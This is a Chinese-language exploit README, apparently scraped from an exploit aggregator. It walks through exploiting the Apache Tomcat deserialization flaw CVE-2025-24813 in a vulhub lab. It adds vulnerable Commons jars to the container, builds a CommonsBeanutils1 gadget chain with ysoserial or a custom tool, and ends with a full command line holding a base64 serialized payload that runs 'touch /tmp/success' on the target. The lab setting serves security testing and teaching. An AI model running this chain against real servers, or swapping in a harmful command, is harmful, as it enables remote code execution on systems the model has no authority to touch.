Share 
## https://sploitus.com/exploit?id=F4BC4A59-1624-5443-8349-107BAD5E50B5
# CVE-2025-24813-vulhub
CVE-2025-24813的vulhub环境的POC脚本

因为有很多小伙伴对该漏洞的利用感觉到疑惑,所以写了这个脚本,帮助大家进行在vulhub中的漏洞利用。

详情查看:[vulhub/tomcat/CVE-2025-24813](https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2025-24813)

vulhub的环境中并没有可以直接进行利用的链(`URLDNS`不算),所以对原有的docker-compose.yml文件进行修改,使其添加进一些具有漏洞依赖的jar包,我这里准备了三个jar包,分别是:`commons-beanutils-1.9.2.jar`、`commons-collections-3.2.1.jar`、`commons-logging-1.1.1.jar`,这三个jar包就能打大多数CC、CB链了。

考虑到该环境中的JDK8版本较高,所以这里我以没有JDK版本要求的`CommonsBeanutils1`链进行利用。

首先修改docker-compose.yml,需要把这三个jar包导入到`vulhub/tomcat/CVE-2025-24813`目录,就像这样:

![image-20250418191941597](./assets/image-20250418191941597.png)

然后修改docker-compose.yml文件如下:

```yaml
services:
 tomcat:
   build: .
   ports:
    - "8080:8080"
   volumes:
      - ./commons-beanutils-1.9.2.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-beanutils-1.9.2.jar
      - ./commons-collections-3.2.1.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.jar
      - ./commons-logging-1.1.1.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-logging-1.1.1.jar

```

![image-20250418191825341](./assets/image-20250418191825341.png)

然后启动该环境:

![image-20250418192107397](./assets/image-20250418192107397.png)

然后使用ysoserial来生成对应的`CommonsBeanutil1`链并使用base64进行编码,或者你使用我写的一个工具叫做`ycpm`,如下:

这条链子就是执行`touch /tmp/success`这条命令。

```
java -jar ycpm-0.0.2-all.jar "CommonsBeanutils1" "touch /tmp/success" "base64->print"
```

![image-20250418192217640](./assets/image-20250418192217640.png)

然后把base64复制一下,运行该脚本即可。如下:

![image-20250418193145156](./assets/image-20250418193145156.png)

如果你只想验证漏洞效果,可以复制我的命令:

```
python .\CVE-2025-24813.py --host=192.168.137.132 --port=8080 --session-id=poc --base64-payload=rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAABpvK/rq+AAAANAA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADJMb3JnL2Vyb3Npb24yMDIwL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADBvcmcvZXJvc2lvbjIwMjAvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABxvcmcvZXJvc2lvbjIwMjAvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASdG91Y2ggL3RtcC9zdWNjZXNzCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyMzE3MzgxNTIzNjYwMAEAHkx5c29zZXJpYWwvUHduZXIzMTczODE1MjM2NjAwOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAACoADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAAC8ADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADMADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXB0ABJQd25yXzMxNzM4MTY2MTY2MDBwdwEAeHEAfgANeA==
```